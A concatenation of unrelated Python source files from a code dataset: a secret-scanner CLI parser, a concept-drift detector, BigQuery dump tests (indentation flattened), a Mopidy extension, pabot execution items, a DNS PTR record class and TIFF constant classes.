        be used (if present).')

    parser_sqlite = customParser(add_help=False)
    parser_sqlite.add_argument(
        '--sqlite', type=str, default=None,
        help='If specified, scan the repo using the sqlite client \
        passing as argument the path of the db. Otherwise, use postgres \
        (must be up and running)')

    parser_scan_base = customParser(add_help=False)
    parser_scan_base.add_argument(
        '--category', default=None, type=str,
        help='If specified, scan the repo using all the rules of this \
        category, otherwise use all the rules in the db')
    parser_scan_base.add_argument(
        '--models', default=None, nargs='+',
        help='A list of models for the ML false positives detection.\nCannot \
        accept empty lists.')
    parser_scan_base.add_argument(
        '--debug', action='store_true',
        help='Flag used to decide whether to visualize the progressbars \
        during the scan (e.g., during the insertion of the detections in \
        the db)')

    # add_rules subparser configuration
    parser_add_rules = subparsers.add_parser(
        'add_rules', help='Add scanning rules from a file to the database',
        parents=[parser_dotenv, parser_sqlite])
    add_rules.configure_parser(parser_add_rules)

    # scan subparser configuration
    parser_scan = subparsers.add_parser(
        'scan', help='Scan a git repository',
        parents=[parser_dotenv, parser_sqlite, parser_scan_base])
    scan.configure_parser(parser_scan)

    # scan_user subparser configuration
    parser_scan_user = subparsers.add_parser(
        'scan_user', help='Scan a GitHub user',
        parents=[parser_dotenv, parser_sqlite, parser_scan_base])
    scan_user.configure_parser(parser_scan_user)

    # scan_wiki subparser configuration
    parser_scan_wiki = subparsers.add_parser(
        'scan_wiki', help='Scan the wiki of a repository',
        parents=[parser_dotenv, parser_sqlite, parser_scan_base])
    scan_wiki.configure_parser(parser_scan_wiki)

    # scan_path subparser configuration
    parser_scan_path = subparsers.add_parser(
        'scan_path', help='Scan a local directory',
        parents=[parser_dotenv, parser_sqlite, parser_scan_base])
    scan_path.configure_parser(parser_scan_path)

    # scan_snapshot subparser configuration
    parser_scan_snapshot = subparsers.add_parser(
        'scan_snapshot', help='Scan the snapshot of a repository',
        parents=[parser_dotenv, parser_sqlite, parser_scan_base])
    scan_snapshot.configure_parser(parser_scan_snapshot)

    # get_discoveries subparser configuration
    # Fixed typo in the help text: "scanened" -> "scanned".
    parser_get_discoveries = subparsers.add_parser(
        'get_discoveries', help='Get discoveries of a scanned repository',
        parents=[parser_dotenv, parser_sqlite])
    get_discoveries.configure_parser(parser_get_discoveries)

    # Run the parser
    if len(sys_argv) == 1:
        main_parser.print_help()
        exit()
    args = main_parser.parse_args(sys_argv[1:])

    # Robustness fix: argparse subparsers are optional by default, so calling
    # e.g. `credentialdigger --dotenv x` without a subcommand would otherwise
    # crash with AttributeError on `args.func`. Show help instead.
    if not hasattr(args, 'func'):
        main_parser.print_help()
        exit()

    # If specified, load dotenv from the given path. Otherwise load from cwd
    load_dotenv(dotenv_path=args.dotenv, verbose=True)

    if args.func in [
        add_rules.run,
        get_discoveries.run,
        scan.run,
        scan_user.run,
        scan_wiki.run,
        scan_path.run,
        scan_snapshot.run
    ]:
        # Connect to db only when running commands that need it
        if args.sqlite:
            client = SqliteClient(args.sqlite)
            logger.info('Database in use: Sqlite')
        else:
            client = PgClient(dbname=os.getenv('POSTGRES_DB'),
                              dbuser=os.getenv('POSTGRES_USER'),
                              dbpassword=os.getenv('POSTGRES_PASSWORD'),
                              dbhost=os.getenv('DBHOST'),
                              dbport=os.getenv('DBPORT'))
            logger.info('Database in use: Postgres')
        args.func(client, args)
    else:
        args.func(args)
| StarcoderdataPython |
83963 | <reponame>AndreFCruz/scikit-multiflow<filename>src/skmultiflow/drift_detection/ddm.py
import numpy as np
from skmultiflow.drift_detection.base_drift_detector import BaseDriftDetector
class DDM(BaseDriftDetector):
    """ DDM method for concept drift detection

    Parameters
    ----------
    min_num_instances: int (default=30)
        The minimum required number of analyzed samples so change can be
        detected. This is used to avoid false detections during the early
        moments of the detector, when the weight of one sample is important.

    warning_level: float (default=2.0)
        Warning Level

    out_control_level: float (default=3.0)
        Out-control Level

    Notes
    -----
    DDM (Drift Detection Method) [1]_ is a concept change detection method
    based on the PAC learning model premise, that the learner's error rate
    will decrease as the number of analysed samples increase, as long as the
    data distribution is stationary.

    If the algorithm detects an increase in the error rate, that surpasses
    a calculated threshold, either change is detected or the algorithm will
    warn the user that change may occur in the near future, which is called
    the warning zone.

    The detection threshold is calculated in function of two statistics,
    obtained when `(pi + si)` is minimum:

    * `pmin`: The minimum recorded error rate.
    * `smin`: The minimum recorded standard deviation.

    At instant `i`, the detection algorithm uses:

    * `pi`: The error rate at instant i.
    * `si`: The standard deviation at instant i.

    The conditions for entering the warning zone and detecting change are
    as follows:

    * if `pi + si >= pmin + 2 * smin` -> Warning zone
    * if `pi + si >= pmin + 3 * smin` -> Change detected

    References
    ----------
    .. [1] <NAME>, <NAME>, <NAME>, <NAME>: Learning
       with Drift Detection. SBIA 2004: 286-295

    Examples
    --------
    >>> # Imports
    >>> import numpy as np
    >>> from skmultiflow.drift_detection import DDM
    >>> ddm = DDM()
    >>> # Simulating a data stream as a normal distribution of 1's and 0's
    >>> data_stream = np.random.randint(2, size=2000)
    >>> # Changing the data concept from index 999 to 1500, simulating an
    >>> # increase in error rate
    >>> for i in range(999, 1500):
    ...     data_stream[i] = 0
    >>> # Adding stream elements to DDM and verifying if drift occurred
    >>> for i in range(2000):
    ...     ddm.add_element(data_stream[i])
    ...     if ddm.detected_warning_zone():
    ...         print('Warning zone has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
    ...     if ddm.detected_change():
    ...         print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
    """

    def __init__(self, min_num_instances=30, warning_level=2.0, out_control_level=3.0):
        super().__init__()
        # Keep the constructor arguments so reset() can restore them.
        self._init_min_num_instances = min_num_instances
        self._init_warning_level = warning_level
        self._init_out_control = out_control_level
        self.sample_count = None
        self.miss_prob = None
        self.miss_std = None
        self.miss_prob_sd_min = None
        self.miss_prob_min = None
        self.miss_sd_min = None
        self.min_instances = None
        self.warning_level = None
        self.out_control_level = None
        self.reset()

    def reset(self):
        """ reset

        Resets the change detector parameters.

        """
        super().reset()
        self.sample_count = 1
        self.miss_prob = 1.0
        self.miss_std = 0.0
        # Running minima of (p), (s) and (p + s); inf until first update.
        self.miss_prob_sd_min = float("inf")
        self.miss_prob_min = float("inf")
        self.miss_sd_min = float("inf")
        self.min_instances = self._init_min_num_instances
        self.warning_level = self._init_warning_level
        self.out_control_level = self._init_out_control

    def add_element(self, prediction):
        """ Add a new element to the statistics

        Parameters
        ----------
        prediction: int (either 0 or 1)
            This parameter indicates whether the last sample analyzed was
            correctly classified or not. 1 indicates an error (miss-classification).

        Notes
        -----
        After calling this method, to verify if change was detected or if
        the learner is in the warning zone, one should call the super method
        detected_change, which returns True if concept drift was detected and
        False otherwise.

        """
        if self.in_concept_change:
            self.reset()

        # Incremental update of the error-rate mean (Bernoulli proportion).
        self.miss_prob = self.miss_prob + (prediction - self.miss_prob) / float(self.sample_count)
        # Standard deviation of a Bernoulli proportion: sqrt(p * (1 - p) / n).
        self.miss_std = np.sqrt(self.miss_prob * (1 - self.miss_prob) / float(self.sample_count))
        self.sample_count += 1

        self.estimation = self.miss_prob
        self.in_concept_change = False
        self.in_warning_zone = False
        self.delay = 0

        # Too few samples to decide anything reliably yet.
        if self.sample_count < self.min_instances:
            return

        # Track the minima of p + s (and the p, s at that point).
        if self.miss_prob + self.miss_std <= self.miss_prob_sd_min:
            self.miss_prob_min = self.miss_prob
            self.miss_sd_min = self.miss_std
            self.miss_prob_sd_min = self.miss_prob + self.miss_std

        # p + s > pmin + 3 * smin (by default) -> drift detected.
        if self.miss_prob + self.miss_std > self.miss_prob_min + self.out_control_level * self.miss_sd_min:
            self.in_concept_change = True
        # p + s > pmin + 2 * smin (by default) -> warning zone.
        elif self.miss_prob + self.miss_std > self.miss_prob_min + self.warning_level * self.miss_sd_min:
            self.in_warning_zone = True
        else:
            self.in_warning_zone = False

    def get_info(self):
        """ Collect information about the concept drift detector.

        Returns
        -------
        string
            Configuration for the concept drift detector.
        """
        description = type(self).__name__ + ': '
        description += 'min_num_instances: {} - '.format(self.min_instances)
        description += 'warning_level: {} - '.format(self.warning_level)
        description += 'out_control_level: {} - '.format(self.out_control_level)
        return description
| StarcoderdataPython |
1745439 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from datetime import datetime
from pytz import UTC
from bqdm.model.dataset import BigQueryAccessEntry, BigQueryDataset
from bqdm.model.schema import BigQuerySchemaField
from bqdm.model.table import BigQueryTable
from bqdm.util import dump
class TestUtil(unittest.TestCase):
def test_dump_dataset(self):
dataset1 = BigQueryDataset(
dataset_id='test1',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US'
)
expected_dump_data1 = """dataset_id: test1
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels: null
"""
actual_dump_data1 = dump(dataset1)
self.assertEqual(expected_dump_data1, actual_dump_data1)
access_entry2 = BigQueryAccessEntry(
'OWNER',
'specialGroup',
'projectOwners'
)
dataset2 = BigQueryDataset(
dataset_id='test2',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry2, )
)
expected_dump_data2 = """dataset_id: test2
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: OWNER
entity_type: specialGroup
entity_id: projectOwners
labels: null
"""
actual_dump_data2 = dump(dataset2)
self.assertEqual(expected_dump_data2, actual_dump_data2)
access_entry3 = BigQueryAccessEntry(
None,
'view',
{
'datasetId': 'test',
'projectId': 'test-project',
'tableId': 'test_table'
}
)
dataset3 = BigQueryDataset(
dataset_id='test3',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry3, )
)
expected_dump_data3 = """dataset_id: test3
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: null
entity_type: view
entity_id:
datasetId: test
projectId: test-project
tableId: test_table
labels: null
"""
actual_dump_data3 = dump(dataset3)
self.assertEqual(expected_dump_data3, actual_dump_data3)
dataset4 = BigQueryDataset(
dataset_id='test4',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
access_entries=(access_entry2, access_entry3)
)
expected_dump_data4 = """dataset_id: test4
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries:
- role: OWNER
entity_type: specialGroup
entity_id: projectOwners
- role: null
entity_type: view
entity_id:
datasetId: test
projectId: test-project
tableId: test_table
labels: null
"""
actual_dump_data4 = dump(dataset4)
self.assertEqual(expected_dump_data4, actual_dump_data4)
label5 = {
'foo': 'bar'
}
dataset5 = BigQueryDataset(
dataset_id='test5',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
labels=label5
)
expected_dump_data5 = """dataset_id: test5
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels:
foo: bar
"""
actual_dump_data5 = dump(dataset5)
self.assertEqual(expected_dump_data5, actual_dump_data5)
label6 = {
'aaa': 'bbb',
'ccc': 'ddd'
}
dataset6 = BigQueryDataset(
dataset_id='test6',
friendly_name='test_friendly_name',
description='test_description',
default_table_expiration_ms=24 * 30 * 60 * 1000,
location='US',
labels=label6
)
expected_dump_data6 = """dataset_id: test6
friendly_name: test_friendly_name
description: test_description
default_table_expiration_ms: 43200000
location: US
access_entries: null
labels:
aaa: bbb
ccc: ddd
"""
actual_dump_data6 = dump(dataset6)
self.assertEqual(expected_dump_data6, actual_dump_data6)
def test_dump_table(self):
table1 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description'
)
expected_dump_data1 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels: null
"""
actual_dump_data1 = dump(table1)
self.assertEqual(expected_dump_data1, actual_dump_data1)
table2 = BigQueryTable(
table_id='test',
friendly_name='fizz_buzz',
description='foo_bar',
expires=datetime(2018, 1, 1, 0, 0, 0, tzinfo=UTC),
partitioning_type='DAY',
)
expected_dump_data2 = """table_id: test
friendly_name: fizz_buzz
description: foo_bar
expires: 2018-01-01T00:00:00.000000+0000
partitioning_type: DAY
view_use_legacy_sql: null
view_query: null
schema: null
labels: null
"""
actual_dump_data2 = dump(table2)
self.assertEqual(expected_dump_data2, actual_dump_data2)
table3 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
view_use_legacy_sql=False,
view_query="""SELECT * FROM
bigquery_datasetmanager.test.test"""
)
expected_dump_data3 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: false
view_query: |-
SELECT * FROM
bigquery_datasetmanager.test.test
schema: null
labels: null
"""
actual_dump_data3 = dump(table3)
self.assertEqual(expected_dump_data3, actual_dump_data3)
schema_field1 = BigQuerySchemaField(
name='test1',
field_type='INTEGER',
mode='NULLABLE',
description='test_description'
)
schema_field2 = BigQuerySchemaField(
name='test2',
field_type='STRING',
mode='REQUIRED',
description='foo_bar'
)
schema_field3 = BigQuerySchemaField(
name='test3',
field_type='RECORD',
mode='NULLABLE',
description='fizz_buzz',
fields=(schema_field1, schema_field2)
)
schema_field4 = BigQuerySchemaField(
name='test4',
field_type='RECORD',
mode='NULLABLE',
description='aaa_bbb',
fields=(schema_field3, )
)
table4 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field1, )
)
expected_dump_data4 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
labels: null
"""
actual_dump_data4 = dump(table4)
self.assertEqual(expected_dump_data4, actual_dump_data4)
table5 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field1, schema_field2)
)
expected_dump_data5 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data5 = dump(table5)
self.assertEqual(expected_dump_data5, actual_dump_data5)
table6 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field3, )
)
expected_dump_data6 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test3
field_type: RECORD
mode: NULLABLE
description: fizz_buzz
fields:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data6 = dump(table6)
self.assertEqual(expected_dump_data6, actual_dump_data6)
table7 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
schema=(schema_field4, )
)
expected_dump_data7 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema:
- name: test4
field_type: RECORD
mode: NULLABLE
description: aaa_bbb
fields:
- name: test3
field_type: RECORD
mode: NULLABLE
description: fizz_buzz
fields:
- name: test1
field_type: INTEGER
mode: NULLABLE
description: test_description
fields: null
- name: test2
field_type: STRING
mode: REQUIRED
description: foo_bar
fields: null
labels: null
"""
actual_dump_data7 = dump(table7)
self.assertEqual(expected_dump_data7, actual_dump_data7)
label1 = {
'foo': 'bar'
}
label2 = {
'fizz': 'buzz',
'aaa': 'bbb'
}
table8 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
labels=label1
)
expected_dump_data8 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels:
foo: bar
"""
actual_dump_data8 = dump(table8)
self.assertEqual(expected_dump_data8, actual_dump_data8)
table9 = BigQueryTable(
table_id='test',
friendly_name='test_friendly_name',
description='test_description',
labels=label2
)
expected_dump_data9 = """table_id: test
friendly_name: test_friendly_name
description: test_description
expires: null
partitioning_type: null
view_use_legacy_sql: null
view_query: null
schema: null
labels:
aaa: bbb
fizz: buzz
"""
actual_dump_data9 = dump(table9)
self.assertEqual(expected_dump_data9, actual_dump_data9)
| StarcoderdataPython |
62514 | <reponame>hayribakici/mopidy-beep<filename>mopidy_beep/__init__.py<gh_stars>0
'''
Mopidy Beep Python module.
'''
import os
import mopidy
__version__ = '0.1'
class Extension(mopidy.ext.Extension):
    '''
    Mopidy Beep extension.
    '''

    dist_name = 'Mopidy-Beep'
    ext_name = 'beep'
    version = __version__

    def get_default_config(self):  # pylint: disable=no-self-use
        '''
        Return the default config, read from the bundled ext.conf file.

        :return: The default config
        '''
        conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
        return mopidy.config.read(conf_file)

    def get_config_schema(self):
        '''
        Return the config schema.

        Currently adds nothing to the base schema; kept as an extension
        point for future config options.

        :return: The config schema
        '''
        schema = super(Extension, self).get_config_schema()
        return schema

    def validate_environment(self):
        # Any manual checks of the environment to fail early.
        # Dependencies described by setup.py are checked by Mopidy, so you
        # should not check their presence here.
        pass

    def setup(self, registry):
        '''
        Setup the extension: register the BeepFrontend with Mopidy.

        :param mopidy.ext.Registry: The mopidy registry
        '''
        # Imported lazily so the module can be loaded without its frontend deps.
        from .frontend import BeepFrontend
        registry.add('frontend', BeepFrontend)
| StarcoderdataPython |
3281131 | <filename>pabot/execution_items.py
from functools import total_ordering
from robot import __version__ as ROBOT_VERSION
from robot.errors import DataError
from robot.utils import PY2, is_unicode
from typing import List, Optional, Union, Dict, Tuple
@total_ordering
class ExecutionItem(object):
    """Base class for items in a pabot execution ordering (suites, tests,
    waits, groups). Ordered and compared by the (name, type) pair;
    `total_ordering` derives the remaining comparison operators from
    __eq__ and __lt__."""

    isWait = False
    type = None  # type: str
    name = None  # type: str

    def top_name(self):
        # type: () -> str
        # First dot-separated component of the name (the top-level suite).
        return self.name.split('.')[0]

    def contains(self, other):
        # type: (ExecutionItem) -> bool
        # Base items contain nothing; subclasses override.
        return False

    def difference(self, from_items):
        # type: (List[ExecutionItem]) -> List[ExecutionItem]
        # Base items have no children to diff; subclasses override.
        return []

    def line(self):
        # type: () -> str
        # Textual (ordering-file / command-line) form; subclasses override.
        return ""

    def modify_options_for_executor(self, options):
        # Register this item under its type key in the executor options dict.
        options[self.type] = self.name

    def __eq__(self, other):
        if isinstance(other, ExecutionItem):
            return ((self.name, self.type) == (other.name, other.type))
        return NotImplemented

    def __ne__(self, other):
        return not (self == other)

    def __lt__(self, other):
        return ((self.name, self.type) < (other.name, other.type))

    def __hash__(self):
        # NOTE(review): combines the two hashes with bitwise OR, which is a
        # weak mixer (many collisions); hash((self.name, self.type)) would be
        # stronger — verify nothing depends on the current values first.
        return hash(self.name) | hash(self.type)

    def __repr__(self):
        return "<" + self.type + ":" + self.name + ">"
class HivedItem(ExecutionItem):
    """Wrapper that binds an execution item to a hive; delegates option
    handling and naming to the wrapped item."""

    type = 'hived'

    def __init__(self, item, hive):
        self._item = item
        self._hive = hive

    def modify_options_for_executor(self, options):
        # Delegate entirely to the wrapped item.
        self._item.modify_options_for_executor(options)

    @property
    def name(self):
        return self._item.name
class GroupItem(ExecutionItem):
    """An ordered group of execution items that run together.

    A group may contain only items of a single type (all tests or all
    suites) and never a #WAIT item. The group's name is built up from the
    member names joined with underscores."""

    type = 'group'

    def __init__(self):
        self.name = 'Group_'
        self._items = []
        self._element_type = None

    def add(self, item):
        """Append `item` to the group.

        :raises DataError: if `item` is a #WAIT, or its type differs from
            the items already in the group.
        """
        if item.isWait:
            raise DataError("[EXCEPTION] Ordering : Group can not contain #WAIT")
        if self._element_type and self._element_type != item.type:
            # Fixed typo in the error message: "Not bouth" -> "not both".
            raise DataError("[EXCEPTION] Ordering : Group can contain only test or suite elements, not both")
        if self._items:
            self.name += '_'
        self.name += item.name
        self._element_type = item.type
        self._items.append(item)

    def modify_options_for_executor(self, options):
        """Accumulate each member's option value into a list under its
        type key (e.g. options['test'] = [name1, name2, ...])."""
        for item in self._items:
            item_options = {}
            item.modify_options_for_executor(item_options)
            options.setdefault(item.type, []).append(item_options[item.type])
class SuiteItem(ExecutionItem):
    """A Robot Framework suite in the execution ordering, optionally with
    its child tests, dynamic tests and sub-suites."""

    type = 'suite'

    def __init__(self, name, tests=None, suites=None, dynamictests=None):
        # type: (str, Optional[List[str]], Optional[List[str]], Optional[List[str]]) -> None
        assert((PY2 and isinstance(name, basestring)) or isinstance(name, str))
        # On Python 2 unicode names are normalized to UTF-8 byte strings.
        self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name
        testslist = [TestItem(t) for t in tests or []]  # type: List[Union[TestItem, DynamicTestItem]]
        dynamictestslist = [DynamicTestItem(t, self.name) for t in dynamictests or []]  # type: List[Union[TestItem, DynamicTestItem]]
        self.tests = testslist + dynamictestslist
        self.suites = [SuiteItem(s) for s in suites or []]

    def line(self):
        # type: () -> str
        return '--suite '+self.name

    def difference(self, from_items):
        # type: (List[ExecutionItem]) -> List[ExecutionItem]
        # Children (tests first, else sub-suites) not present in from_items.
        if self.tests:
            return [t for t in self.tests if t not in from_items]
        if self.suites:
            return [s for s in self.suites if s not in from_items]
        return []

    def contains(self, other):
        # type: (ExecutionItem) -> bool
        # A suite contains itself and any item whose dotted name is nested
        # under this suite's name.
        if self == other:
            return True
        return other.name.startswith(self.name+".")

    def tags(self):
        #TODO Make this happen
        return []
class TestItem(ExecutionItem):
    """A single Robot Framework test case in the execution ordering."""

    type = 'test'

    def __init__(self, name):
        # type: (str) -> None
        # On Python 2 unicode names are normalized to UTF-8 byte strings.
        self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name

    def line(self):
        # type: () -> str
        return '--test '+self.name

    # The method variant is chosen at class-creation time based on the
    # installed Robot Framework version.
    # NOTE(review): this is a lexicographic string comparison, not a semantic
    # version compare (e.g. '10.0' < '3.1' as strings) — verify against the
    # supported RF versions.
    if ROBOT_VERSION >= '3.1':
        def modify_options_for_executor(self, options):
            # A named test replaces any --rerunfailed selection.
            if 'rerunfailed' in options:
                del options['rerunfailed']
            # RF >= 3.1 treats [, ? and * in --test as glob patterns;
            # escape them by wrapping each in a character class.
            name = self.name
            for char in ['[', '?', '*']:
                name = name.replace(char, '['+char+']')
            options[self.type] = name
    else:
        def modify_options_for_executor(self, options):
            # A named test replaces any --rerunfailed selection.
            if 'rerunfailed' in options:
                del options['rerunfailed']

    def difference(self, from_items):
        # type: (List[ExecutionItem]) -> List[ExecutionItem]
        return []

    def contains(self, other):
        # type: (ExecutionItem) -> bool
        return self == other

    def tags(self):
        #TODO Make this happen
        return []
class DynamicSuiteItem(SuiteItem):
    """A suite whose execution is parameterized with extra --variable
    values appended to the executor options."""

    type = 'dynamicsuite'

    def __init__(self, name, variables):
        SuiteItem.__init__(self, name)
        self._variables = variables

    def modify_options_for_executor(self, options):
        # Copy the existing variable list so the shared options are not mutated.
        variables = options.get('variable', [])[:]
        variables.extend(self._variables)
        options['variable'] = variables
class DynamicTestItem(ExecutionItem):
    """A dynamically created test, identified by its containing suite and
    selected at runtime through a DYNAMICTEST:<name> variable."""

    type = 'dynamictest'

    def __init__(self, name, suite):
        # type: (str, str) -> None
        # On Python 2 unicode names are normalized to UTF-8 byte strings.
        self.name = name.encode("utf-8") if PY2 and is_unicode(name) else name
        self.suite = suite # type:str

    def line(self):
        return 'DYNAMICTEST %s :: %s' % (self.suite, self.name)

    def modify_options_for_executor(self, options):
        # Run the containing suite; the test itself is selected via the
        # DYNAMICTEST variable.
        options['suite'] = self.suite
        # Copy the existing variable list so the shared options are not mutated.
        variables = options.get('variable', [])[:]
        variables.append("DYNAMICTEST:"+self.name)
        options['variable'] = variables

    def difference(self, from_items):
        return []

    def contains(self, other):
        return self == other

    def tags(self):
        #TODO Make this happen
        return []
class WaitItem(ExecutionItem):
    """The #WAIT marker: a synchronization barrier between ordering groups."""

    type = "wait"
    isWait = True

    def __init__(self):
        self.name = "#WAIT"

    def line(self):
        return self.name
class GroupStartItem(ExecutionItem):
    """Marks the opening brace `{` of a group in an ordering file."""

    type = "group"

    def __init__(self):
        self.name = "#START"

    def line(self):
        return "{"
class GroupEndItem(ExecutionItem):
    """Marks the closing brace `}` of a group in an ordering file."""

    type = "group"

    def __init__(self):
        self.name = "#END"

    def line(self):
        return "}"
class IncludeItem(ExecutionItem):
    """A tag-based selection item, mapping to Robot Framework's --include."""

    type = "include"

    def __init__(self, tag):
        self.name = tag

    def line(self):
        return '--include '+self.name

    def contains(self, other):
        # An include "contains" any item carrying this tag.
        return self.name in other.tags()

    def tags(self):
        return [self.name]
class SuiteItems(ExecutionItem):
    """A bundle of several suites executed together in one process."""

    type = "suite"

    def __init__(self, suites):
        self.suites = suites
        # Combined display name: the member suite names, space-separated.
        self.name = " ".join([suite.name for suite in suites])

    def modify_options_for_executor(self, options):
        # Pass all member suite names as the --suite selection.
        options['suite'] = [suite.name for suite in self.suites]
102280 | from .base import ResourceRecord
from ..domains.domain import Domain
class PTR(ResourceRecord):
    """DNS PTR resource record (type 12): maps an address back to a domain
    name stored in `ptrdname`."""

    class _Binary(ResourceRecord._Binary):
        @property
        def full(self):
            # Wire format of a PTR RDATA is just the encoded domain name.
            return self.resource_record.ptrdname.binary_raw

    id = 12
    # Attribute names used by the base class for repr/serialization.
    repr = ['ptrdname']

    @classmethod
    def parse_bytes(cls, answer, read_len):
        """Build a PTR record by decoding the domain name from the wire
        message (read_len is unused; the domain encoding is self-delimiting)."""
        instance = cls(answer)
        instance.ptrdname = Domain.decode(answer.message)
        return instance

    @classmethod
    def parse_dict(cls, answer, data):
        """Build a PTR record from a dict with a 'ptrdname' key."""
        instance = cls(answer)
        instance.ptrdname = Domain(data.get('ptrdname'))
        return instance

    @property
    def __dict__(self):
        # NOTE(review): overriding __dict__ as a property is unusual — it is
        # presumably consumed by the base class's serialization; verify before
        # refactoring.
        return {'ptrdname': self.ptrdname}

    @classmethod
    def from_json(cls, answer, data):
        """Build a PTR record from parsed JSON (same shape as parse_dict)."""
        instance = cls(answer)
        instance.ptrdname = Domain(data.get('ptrdname'))
        return instance
3325222 | <gh_stars>10-100
# flake8: noqa 501
# Disable flake8 line-length check (E501), it makes this file harder to read
import struct
from .exceptions import UnknownTagError
class TiffConstant(int):
    """An int subclass carrying a symbolic name and arbitrary extra fields.

    Equality is deliberately loose: a constant compares equal to its numeric
    value, to strings that parse as that value (including 0x/0o/0b forms),
    and to its name, case-insensitively.
    """

    def __new__(cls, value, *args, **kwargs):
        # int is immutable, so the numeric value must be fixed in __new__.
        return super().__new__(cls, value)

    def __init__(self, value, constantDict):
        """
        Create a constant.  The constant is at least a value and an
        associated name; any other keys of *constantDict* become attributes.

        :param value: an integer.
        :param constantDict: a dictionary with at least a 'name' key.
        """
        vars(self).update(constantDict)
        # Assign after the update so an explicit 'value' key cannot win.
        self.value = value
        self.name = str(getattr(self, 'name', self.value))

    def __str__(self):
        numeric = '%d (0x%X)' % (self.value, self.value)
        if str(self.name) == str(self.value):
            return numeric
        return '%s %s' % (self.name, numeric)

    def __getitem__(self, key):
        # Dict-style access to the constant's attributes.
        try:
            return getattr(self, str(key))
        except AttributeError:
            raise KeyError(key)

    def __int__(self):
        return self.value

    def __eq__(self, other):
        if isinstance(other, TiffConstant):
            # Two constants match only when both value and name agree.
            return self.value == other.value and self.name == other.name
        try:
            return self.value == int(other)
        except ValueError:
            # Not plain decimal; retry allowing 0x/0o/0b prefixed literals.
            try:
                return self.value == int(other, 0)
            except ValueError:
                pass
        except TypeError:
            # Not numeric-convertible at all (e.g. None, list).
            return False
        # Fall back to a case-insensitive name comparison.
        return self.name.upper() == other.upper()

    def __ne__(self, other):
        return not self.__eq__(other)

    def __contains__(self, other):
        return hasattr(self, str(other))

    def __hash__(self):
        # Hash on (class name, value) so equal-valued constants from
        # different sets hash apart.
        return hash((type(self).__name__, self.value))

    def get(self, key, default=None):
        """Return the attribute *key* if present, else *default*."""
        return getattr(self, str(key), default)
class TiffTag(TiffConstant):
    """A TIFF tag constant with helpers describing how its data is stored."""

    def isOffsetData(self):
        # Tags whose values live elsewhere in the file carry a 'bytecounts'
        # property describing the companion byte-count tag.
        return 'bytecounts' in self

    def isIFD(self):
        """Return True when this tag's datatype marks it as a sub-IFD pointer."""
        dtypes = self.get('datatype', None)
        if isinstance(dtypes, tuple):
            return Datatype.IFD in dtypes or Datatype.IFD8 in dtypes
        return dtypes == Datatype.IFD or dtypes == Datatype.IFD8
class TiffConstantSet(object):
    """A lookup table of TiffConstant values, addressable by name or number."""
    def __init__(self, setNameOrClass, setDict):
        """
        Create a set of TiffConstant values.
        :param setNameOrClass: the set name or class; this is the class name
            for the constants.  If a class, this must be a subclass of
            TiffConstant.
        :param setDict: a dictionary to turn into TiffConstant values.  The
            keys should be integers and the values dictionaries with at least a
            name key.
        """
        if isinstance(setNameOrClass, str):
            # Create a TiffConstant subclass on the fly and publish it at
            # module scope so its instances carry a meaningful type name.
            setClass = type(setNameOrClass, (TiffConstant,), {})
            globals()[setNameOrClass] = setClass
        else:
            setClass = setNameOrClass
        entries = {}
        names = {}
        for k, v in setDict.items():
            entry = setClass(k, v)
            entries[k] = entry
            # Index by upper-cased name and by decimal value string; later
            # entries silently override earlier ones on name collisions.
            names[entry.name.upper()] = entry
            names[str(int(entry))] = entry
            if 'altnames' in v:
                for altname in v['altnames']:
                    names[altname.upper()] = entry
